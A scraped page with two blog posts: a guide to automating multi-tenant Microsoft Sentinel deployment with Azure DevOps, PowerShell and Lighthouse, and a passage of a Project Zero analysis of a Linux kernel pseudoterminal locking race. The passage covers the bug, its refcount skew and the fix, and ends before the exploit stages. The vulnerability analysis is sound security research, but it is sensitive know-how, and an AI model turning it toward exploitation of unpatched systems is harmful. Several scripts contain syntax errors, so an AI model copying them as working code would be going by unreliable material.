            "Name": "ncc_t1558.003_kerberoasting"
        },
        {
            "Name": "ncc_t1558.003_kerberoasting_downgrade_v1a"
        }
    ],
    "SavedSearches": [],
    "TargetWorkspaceName": "targetworkspace",
    "TargetResourceGroup": "targetresourcegroup",
    "Location": "UK South",
    "connectors": "Office365,ThreatIntelligence,OfficeATP,AzureAdvancedThreatProtection,AzureActiveDirectory,MicrosoftDefenderAdvancedThreatProtection,AzureSecurityCenter,MicrosoftCloudAppSecurity,AzureActivity,SecurityEvents,WindowsFirewall,DNS,Syslog"
}

This data can then be pushed onto a storage account and imported into Git from a pipeline triggered through the app.

pool:
vmImage: 'windows-latest'

steps:
-checkout: self
 persistCredentials: true
  clean: true
- task: [email protected]
  displayName: 'Export Configs'
  inputs:
azureSubscription: 'Tenant A Service Connection name'
    ScriptType: 'FilePath'
    ScriptPath: '$(Build.SourcesDirectory)/Scripts/Exports/ConfigExport.ps1'
    ScriptArguments: '-resourceGroupName "StorageAccountResourceGroupName" -storageName "storageaccountname" -outPath "Sentinel\ClientConfigs\" -container "configs"'
    azurePowerShellVersion: 'LatestVersion'

- task: [email protected]
  displayName: 'Commit Changes to new Git Branch'
  inputs:
filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/PushToGit.ps1'
    arguments: '-branchName conf$(Build.BuildNumber)'

Where ConfigExports.ps1 is

param(
    [string]$ResourceGroupName ,
    [string]$storageName ,
    [string]$outPath =,
    [string]$container
)

$ctx = (Get-AzStorageAccount -ResourceGroupName $ResourceGroupName -Name $storageName).Context
$blobs  = Get-AzStorageBlob -Container $container -Context $ctx

if(-not (Test-Path -Path $outPath))
{
New-Item -ItemType directory $outPath -Force
}
Get-ChildItem -Path $outPath -Recurse | Remove-Item -force -recurse
foreach($file in $blobs)
{
Get-AzStorageBlobContent -Context $ctx -Container $container -Blob $file.Name  -Destination ("$($outPath)/$($file.Name)") -Force
}

And PushToGit.ps1

param(
[string] $branchName
)
git --version
git switch -c $branchName
git add -A
git config user.email [email protected]
git config user.name "Automated Build"
git commit -a -m "Commiting rules to git"
git push --set-upstream -f origin $branchName

This will download the config files, create a new Branch in the Azure DevOps Git Repo and upload the files.

The branch can then be reviewed and merged. You could bypass this and check directly into the main branch if you want less manual intervention, but the manual review adds an extra layer of security to ensure no configs are accidentally / maliciously changed.

Creating Analytics

For analytics creation we have 2 options.

  1. Create Analytics in a Sentinel Test environment and export them to git. This will allow you to source control analytics as well as review any changes before allowing them into the main branch.
param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$outPath,
[string]$module='Scripts/Modules/Remove-InvalidFileNameChars.ps1'
)
import-module $module

Install-Module -Name Az.Accounts -AllowClobber -Force

Install-Module -Name Az.SecurityInsights -AllowClobber -Force

$results =Get-AzSentinelAlertRule -WorkspaceName $workspaceName -ResourceGroupName $resourceGroupName
$results
$myExtension = ".json"
$output = @()
foreach($temp in $results){
    
    if($temp.DisplayName)
    {
    $resultName = $temp.DisplayName
    if($temp.query)
    {
    if($temp.query.Contains($workspaceName))
    {
    $temp.query= $temp.query -replace $workspaceName , '{{targetWorkspace}}'
    $myExportPath = "$($outPath)\Alerts\$($temp.productFilter)\"
    if(-not (Test-Path -Path $myExportPath))
    {
    new-item -ItemType Directory -Force -Path $myExportPath
    }
    $rule = $temp | ConvertTo-Json
    $resultName = Remove-InvalidFileNameChars -Name $resultName
    $folder = "$($myExportPath)$($resultName)$($myExtension)"
    $properties= [pscustomobject]@{DisplayName=($temp.DisplayName);RuleName=$resultName;Category=($temp.productFilter);Path=$myExportPath}
    $output += $properties
    $rule | Out-File $folder -Force
    }
    }
    }
} 

Note the -replace $workspaceName , ‘{{targetWorkspace}}’. This replaces the actual workspace used in our test environments via workspace(‘testworkspaceName’)with workspace(‘{{targetWorkspace}}’) to allow us to then replace it with the actual “Sub tenants” workspace name when being deployed.

  1. Create your own analytics in a custom portal, for the Blazor Portal I found Microsoft.Azure.Kusto.Language very useful for validating the KQL queries.

The benefit of creating your own is the ability to enrich what goes into them.

You might, for example, want to add full MITRE details into the analytics to be able to easily generate a MITRE coverage report for the created analytics.

If you are this way inclined, when deploying the analytics, use a generic template from Sentinel and replace the required values before submitting it back to your target Sentinel.

{
    "AlertRuleTemplateName":  null,
    "DisplayName":  "{DisplayPrefix}{DisplayName}",
    "Description":  "{Description}",
    "Enabled":  true,
    "LastModifiedUtc":  "\/Date(1619707105808)\/",
    "Query":  "{query}"
    "QueryFrequency":  {
                           "Ticks":  9000000000,"Days":  0,
                           "Hours":  0, "Milliseconds":  0, Minutes":  15, "Seconds":  0,
                           "TotalDays":  0.010416666666666666, "TotalHours":  0.25,
                           "TotalMilliseconds":  900000,
                           "TotalMinutes":  15, "TotalSeconds":  900
                       },
    "QueryPeriod":  {
                        "Ticks":  9000000000,
                        "Days":  0, "Hours":  0, "Milliseconds":  0, "Minutes":  15,
                        "Seconds":  0,
                        "TotalDays":  0.010416666666666666,
                        "TotalHours":  0.25,
                        "TotalMilliseconds":  900000,
                        "TotalMinutes":  15,
                        "TotalSeconds":  900
                    },
    "Severity":  "{Severity}",
    "SuppressionDuration":  {
"Ticks":  180000000000, "Days":  0, "Hours":  5, "Milliseconds":  0, "Minutes":  0,"Seconds":  0,"TotalDays":  0.20833333333333331, "TotalHours":  5, "TotalMilliseconds":  18000000, "TotalMinutes":  300, "TotalSeconds":  18000
                            },
    "SuppressionEnabled":  false, "TriggerOperator":  0, "TriggerThreshold":  0,
    "Tactics":  [
                    "DefenseEvasion"
                ],
    "Id":  "{alertRuleID}",
    "Name":  "{alertRuleguid}",
    "Type":  "Microsoft.SecurityInsights/alertRules",
    "Kind":  "Scheduled"
}

Let’s Lighthouse this up!

Now we have the service connections and initial client config in place, we can start building the Onboarding pipeline for Tenant B.

As part of this we will cover:

  • Generate consistent naming conventions
  • Creating the Log Analytics workspace specified in config and enabling Sentinel
  • Setting up the Lighthouse connection to Tenant A
  • Enabling the required Connectors in Sentinel

Consistent naming (optional)

There are a lot of different ways for getting naming conventions done.

I quite like to push a few parameters into a PowerShell script, then write the naming conventions back to the pipeline, so the convention script can be used in multiple pipelines to provide consistency and easy maintainability.

The below script generates variables for a select number of resources, then pushes them out to the pipeline.

param(
[string]$location,[string]$environment,[string]$customerIdentifier,[string]$instance)
$location = $location.ToLower()
$environment = $environment.ToLower()
$customerIdentifier = $customerIdentifier.ToLower()
$instance = $instance.ToLower()
$conventions = New-Object -TypeName psobject 
$conventions | Add-Member -MemberType NoteProperty -Name CustomerResourceGroup -Value "rg-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name LogAnalyticsWorkspace -Value "la-$($location)-$($environment)-$($customerIdentifier)$($instance)"
$conventions | Add-Member -MemberType NoteProperty -Name CustLogicAppPrefix -Value "wf-$($location)-$($environment)-$($customerIdentifier)-"
$conventions | Add-Member -MemberType NoteProperty -Name CustFunctionAppPrefix -Value "fa-$($location)-$($environment)-$($customerIdentifier)-"
foreach($convention in $conventions.psobject.Properties | Select-Object -Property name, value)
{
Write-Host "##vso[task.setvariable variable=$($convention.name);isOutput=true]$($convention.Value)"
}

Sample use would be

  - task: [email protected]
    name: "naming"
    inputs:
      filePath: '$(Build.SourcesDirectory)/Scripts/PipelineLogic/GenerateNamingConvention.ps1'
      arguments: '-location "some Location" -environment "some environment" -customerIdentifier "some identifier" -instance "some instance"'

  - task: [email protected]
    displayName: 'Sample task using variables from naming task'
    inputs:
      azureSubscription: '$(ServiceConnection)'
      ScriptType: 'FilePath'
      ScriptPath: 'some script path'
      ScriptArguments: '-resourceGroup "$(naming.StorageResourceGroup )" -workspaceName "$(naming.LogAnalyticsWorkspace)"'
      azurePowerShellVersion: 'LatestVersion'
      pwsh: true

Configure Log analytics workspace in sub tenant / enable Sentinel

You could do the following using ARM, however, in the actual solution, I am doing a lot of additional taskswith the Workspace that were much easier to achieve in script (hence my choice to script it instead).

Create new workspace if it doesn’t exist:

param(
[string]$resourceGroupName,
[string]$workspaceName,
[string]$Location
[string]$sku
)
$rg = Get-AzResourceGroup -Name $resourceGroupName -ErrorAction SilentlyContinue
if(-not $rg)
{
New-AzResourceGroup -Name $resourceGroupName -Location $Location
}
$ws = Get-AzOperationalInsightsWorkspace -ResourceGroupName $resourceGroupName -Name $workspaceName -ErrorAction SilentlyContinue
if(-not $ws){
$ws = New-AzOperationalInsightsWorkspace -Location $Location -Name $workspaceName -Sku $sku -ResourceGroupName $resourceGroupName -RetentionInDays 90
}

Check if Sentinel is already enabled for the Workspace and enable it if not:

param(
[string]$resourceGroupName,
[string]$workspaceName
)
Install-Module AzSentinel -Scope CurrentUser -Force -AllowClobber
Import-Module AzSentinel

    $solutions = Get-AzOperationalInsightsIntelligencePack -resourcegroupname $resourceGroupName -WorkspaceName $workspaceName -ErrorAction SilentlyContinue

    if (($solutions | Where-Object Name -eq 'SecurityInsights').Enabled) {
        Write-Host "SecurityInsights solution is already enabled for workspace $($workspaceName)"
    }
    else {
        Set-AzSentinel -WorkspaceName $workspaceName -Confirm:$false
    }

Setting up Lighthouse to the Master tenant

param(
[string]$customerConfig='',
[string]$templateFile = '',
[string]$templateParameterFile='',
[string]$AadGroupID='',
[string]$tenantId=''
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId" 

This script takes in the config file we generated earlier to read out client or  sub tenant values for location and the resource group in the sub tenant then sets up Lighthouse with the below ARM template / parameter file after replacing the ’principalID’ placeholder in the config with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template  and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted using the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the Sub tenant you can add andchange the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
"mspOfferName": {"type": "string",},"mspOfferDescription": {"type": "string",}, "managedByTenantId": {"type": "string",},"authorizations": {"type": "array",}, "rgName": {"type": "string"}},
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"},
    "resources": [{
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }},
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"],
            "properties":{
                "mode":"Incremental",
                "template":{
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
} } ]} } }],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }}}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM and I imagine this will still be the case for new connectors as they get added to Sentinel, so I will provide the different ways of handling both deployment types and how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

 Roberto Rodriquez’s Azure-Sentinel2Go 

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then, compare them to the list of connectors that are already enabled

param(
    [string]$templateLocation = '',
    [string]$customerConfig 
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$connectors=$config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | select-object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check} 
$tenantId = (get-azcontext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach($con in $outputArray)
{
    write-host "deploying $($con)"
    $out = $null 
   $out=  New-AzResourceGroupDeployment -resourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)"-workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
   if($out.ProvisioningState -eq "Failed")
   {
       write-host '------------------------'
       write-host "Unable to deploy $($con)"
       $out | Format-Table
       write-host '------------------------'
       Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
   }
   else{
       write-host "deployed $($con)"
   }

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If there is a connector not currently available such as the Active Directory Diagnostics one was when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector, then on the last step when submitting open the debug console (Dev tools) in your browser and on the Network tab look through the posts made.
  3. There should be one containing the payload for the connector you just enabled with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the required permissions needed and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the post message, replacing required values such as workspace name with the one used for your target environment

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

           $payload =         '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties =$ payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        $connectorBody = @{}

        $connectorBody | Add-Member -NotePropertyName name -NotePropertyValue "AzureSentinel_$($WorkspaceName)"
        $connectorBody.Add("properties",$connectorProperties)

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $($result.Content)" 
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $errorReturn" 
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps and onboarded a sub tenant and are in the Azure AD group, you should now be able to see the sub tenants Log analytics workspace in your Master Tenant Sentinel, at this stage you can also remove the service principle in the sub tenant.

If you cannot see it:

It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.

Ensure you have the sub tenant selected in “Directories + Subscriptions”

In Sentinel, make sure the subscription is selected in your filter

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance you just need to make sure you set the workspace inside of the query to the correct one.

$alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json  
$analyticsTemplate =$ alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) 

In my case, I am loading a custom analytics file, so need to combine it with my template file so need to set a few more bits.

  $alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json 
      $workspaceName = '$(naming.LogAnalyticsWorkspace)'
      $resourceGroupName= '$(naming.CustomerResourceGroup)'
      $id = New-Guid
      $analyticsTemplate = (Get-Content -Path $detectionPath )  -replace '{DisplayPrefix}' , 'Sentinel-' -replace '{DisplayName}' , $alert.display_name   -replace '{DetectionName}' , $alert.detection_name  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) |ConvertFrom-Json 
      
      $QueryPeriod =([timespan]$alert.Interval)
      $lookbackPeriod = ([timespan]$alert.LookupPeriod)
      $SuppressionDuration = ([timespan]$alert.LookupPeriod)
      
      $alert.detection_query=$alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)
      $alert.detection_query
      $tempDescription = $alert.description
      $analyticsTemplate.Severity = $alert.severity 

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the Analytics workspace that is now visible in the Master tenant through Lighthouse
  2. create a new workspace, and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics for example workspace(targetworkspace).DeviceEvents.

The latter solution keeps all the analytics in the Master tenant, so all queries can be stored there and do not go into the sub tenant (can be useful for protecting intellectual property or just having all analytics in one single workspace pointing at all the others).

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly
  • neither of them worked with adding entities.

So in a rather unpleasant solution I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
    1. Add the tactic in using azsentinel\New-AzSentinelAlertRule
    1. Add the entities and final settings in using the API
  Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled  -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold 
       $newAlert =azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName  | where-object {$_.name -eq $id}
       $newAlert.Query =  $alert.detection_query
      $newAlert.enabled = $analyticsTemplate.Enabled
       azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration 
      
      $additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
      $additionUri
      $result = Invoke-AzRestMethod -Path $additionUri -Method Get
      $entityCont ='[]'| ConvertFrom-Json
        $entities = $alert.analyticsEntities.entityMappings | convertto-json -Depth 4
        $content  = $result.Content | ConvertFrom-Json
        $tactics= $alert.tactic.Split(',') | ConvertTo-Json
      $aggregation = 'SingleAlert'
      if($alert.Grouping)
      {
      if($alert.Grouping -eq 'AlertPerResult')
      {
        $aggregation = 'AlertPerResult'
      }}

      $body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'
     
 $res = Invoke-AzRestMethod -path $additionUri -Method Put -Payload $body 

You should now have all the components needed to create your own multi-Tenant enterprise scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom made analytics to a multitude of workspaces
  2. Being able to source control analytics and code review them before deploying
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant
  4. Consistent RBAC for all tenants
  5. A huge amount of room to extend on this solution.


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

How a simple Linux kernel memory corruption bug can lead to complete system compromise

19 October 2021 at 16:08
By: Ryan

An analysis of current and potential kernel security mitigations

Posted by Jann Horn, Project Zero

Introduction

This blog post describes a straightforward Linux kernel locking bug and how I exploited it against Debian Buster's 4.19.0-13-amd64 kernel. Based on that, it explores options for security mitigations that could prevent or hinder exploitation of issues similar to this one.

I hope that stepping through such an exploit and sharing this compiled knowledge with the wider security community can help with reasoning about the relative utility of various mitigation approaches.

A lot of the individual exploitation techniques and mitigation options that I am describing here aren't novel. However, I believe that there is value in writing them up together to show how various mitigations interact with a fairly normal use-after-free exploit.

Our bugtracker entry for this bug, along with the proof of concept, is at https://bugs.chromium.org/p/project-zero/issues/detail?id=2125.

Code snippets in this blog post that are relevant to the exploit are taken from the upstream 4.19.160 release, since that is what the targeted Debian kernel is based on; some other code snippets are from mainline Linux.

(In case you're wondering why the bug and the targeted Debian kernel are from end of last year: I already wrote most of this blogpost around April, but only recently finished it)

I would like to thank Ryan Hileman for a discussion we had a while back about how static analysis might fit into static prevention of security bugs (but note that Ryan hasn't reviewed this post and doesn't necessarily agree with any of my opinions). I also want to thank Kees Cook for providing feedback on an earlier version of this post (again, without implying that he necessarily agrees with everything), and my Project Zero colleagues for reviewing this post and frequent discussions about exploit mitigations.

Background for the bug

On Linux, terminal devices (such as a serial console or a virtual console) are represented by a struct tty_struct. Among other things, this structure contains fields used for the job control features of terminals, which are usually modified using a set of ioctls:

struct tty_struct {
[...]
spinlock_t ctrl_lock;
[...]
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
[...]
struct tty_struct *link;
[...]
}[...];

The pgrp field points to the foreground process group of the terminal (normally modified from userspace via the TIOCSPGRP ioctl); the session field points to the session associated with the terminal. Both of these fields do not point directly to a process/task, but rather to a struct pid. struct pid ties a specific incarnation of a numeric ID to a set of processes that use that ID as their PID (also known in userspace as TID), TGID (also known in userspace as PID), PGID, or SID. You can kind of think of it as a weak reference to a process, although that's not entirely accurate. (There's some extra nuance around struct pid when execve() is called by a non-leader thread, but that's irrelevant here.)

All processes that are running inside a terminal and are subject to its job control refer to that terminal as their "controlling terminal" (stored in ->signal->tty of the process).

A special type of terminal device are pseudoterminals, which are used when you, for example, open a terminal application in a graphical environment or connect to a remote machine via SSH. While other terminal devices are connected to some sort of hardware, both ends of a pseudoterminal are controlled by userspace, and pseudoterminals can be freely created by (unprivileged) userspace. Every time /dev/ptmx (short for "pseudoterminal multiplexor") is opened, the resulting file descriptor represents the device side (referred to in documentation and kernel sources as "the pseudoterminal master") of a new pseudoterminal . You can read from it to get the data that should be printed on the emulated screen, and write to it to emulate keyboard inputs. The corresponding terminal device (to which you'd usually connect a shell) is automatically created by the kernel under /dev/pts/<number>.

One thing that makes pseudoterminals particularly strange is that both ends of the pseudoterminal have their own struct tty_struct, which point to each other using the link member, even though the device side of the pseudoterminal does not have terminal features like job control - so many of its members are unused.

Many of the ioctls for terminal management can be used on both ends of the pseudoterminal; but no matter on which end you call them, they affect the same state, sometimes with minor differences in behavior. For example, in the ioctl handler for TIOCGPGRP:

/**
* tiocgpgrp - get process group
* @tty: tty passed by user
* @real_tty: tty side of the tty passed by the user if a pty else the tty
* @p: returned pid
*
* Obtain the process group of the tty. If there is no process group
* return an error.
*
* Locking: none. Reference to current->signal->tty is safe.
*/
static int tiocgpgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pid;
int ret;
/*
* (tty == real_tty) is a cheap way of
* testing if the tty is NOT a master pty.
*/
if (tty == real_tty && current->signal->tty != real_tty)
return -ENOTTY;
pid = tty_get_pgrp(real_tty);
ret = put_user(pid_vnr(pid), p);
put_pid(pid);
return ret;
}

As documented in the comment above, these handlers receive a pointer real_tty that points to the normal terminal device; an additional pointer tty is passed in that can be used to figure out on which end of the terminal the ioctl was originally called. As this example illustrates, the tty pointer is normally only used for things like pointer comparisons. In this case, it is used to prevent TIOCGPGRP from working when called on the terminal side by a process which does not have this terminal as its controlling terminal.

Note: If you want to know more about how terminals and job control are intended to work, the book "The Linux Programming Interface" provides a nice introduction to how these older parts of the userspace API are supposed to work. It doesn't describe any of the kernel internals though, since it's written as a reference for userspace programming. And it's from 2010, so it doesn't have anything in it about new APIs that have showed up over the last decade.

The bug

The bug was in the ioctl handler tiocspgrp:

/**
* tiocspgrp - attempt to set process group
* @tty: tty passed by user
* @real_tty: tty side device matching tty passed by user
* @p: pid pointer
*
* Set the process group of the tty to the session passed. Only
* permitted where the tty session is our session.
*
* Locking: RCU, ctrl lock
*/
static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
struct pid *pgrp;
pid_t pgrp_nr;
[...]
if (get_user(pgrp_nr, p))
return -EFAULT;
[...]
pgrp = find_vpid(pgrp_nr);
[...]
spin_lock_irq(&tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
spin_unlock_irq(&tty->ctrl_lock);
[...]
}

The pgrp member of the terminal side (real_tty) is being modified, and the reference counts of the old and new process group are adjusted accordingly using put_pid and get_pid; but the lock is taken on tty, which can be either end of the pseudoterminal pair, depending on which file descriptor we pass to ioctl(). So by simultaneously calling the TIOCSPGRP ioctl on both sides of the pseudoterminal, we can cause data races between concurrent accesses to the pgrp member. This can cause reference counts to become skewed through the following races:

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(A)
real_tty->pgrp = get_pid(B)
spin_unlock_irq(...) spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
spin_lock_irq(...) spin_lock_irq(...)
put_pid(old_pid)
put_pid(old_pid)
real_tty->pgrp = get_pid(B)
real_tty->pgrp = get_pid(A)
spin_unlock_irq(...) spin_unlock_irq(...)

In both cases, the refcount of the old struct pid is decremented by 1 too much, and either A's or B's is incremented by 1 too much.

Once you understand the issue, the fix seems relatively obvious:

    if (session_of_pgrp(pgrp) != task_session(current))
goto out_unlock;
retval = 0;
- spin_lock_irq(&tty->ctrl_lock);
+ spin_lock_irq(&real_tty->ctrl_lock);
put_pid(real_tty->pgrp);
real_tty->pgrp = get_pid(pgrp);
- spin_unlock_irq(&tty->ctrl_lock);
+ spin_unlock_irq(&real_tty->ctrl_lock);
out_unlock:
rcu_read_unlock();
return retval;

Attack stages

